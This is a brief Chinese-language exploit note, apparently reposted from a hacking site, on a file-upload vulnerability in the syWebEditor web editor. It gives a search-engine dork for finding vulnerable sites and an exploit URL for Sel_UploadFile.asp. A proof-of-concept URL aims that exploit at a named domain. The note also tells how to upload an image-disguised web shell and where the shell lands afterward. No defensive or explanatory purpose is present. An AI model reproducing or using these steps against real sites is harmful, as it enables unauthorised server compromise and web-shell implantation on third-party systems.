某系统syWebEditor上传漏洞利用

关键字:inurl:syWebEditor

 
EXP:/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7Cjpg%7Cpng%
 
7C&filePathType=1&filePath=/PhotoFile/ProFile/
 
poc:http://www.hackqing.cn/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7Cjpg%7Cpng%
 
7C&filePathType=1&filePath=/PhotoFile/ProFile/

上传解析图片马:如果不变动就是www.hackqing.cn/PhotoFile/ProFile/马的名字
在这里有一个“自动命名”,这个可以自选

本文转自 ☆★ 包罗万象网 ★☆ - http://www.baoluowanxiang.com 转载请注明出处,侵权必究!
原文链接:http://www.baoluowanxiang.com/a/net-offense/loophole/2010/0602/937.html

你可能感兴趣的:(html,.net,asp.net,asp)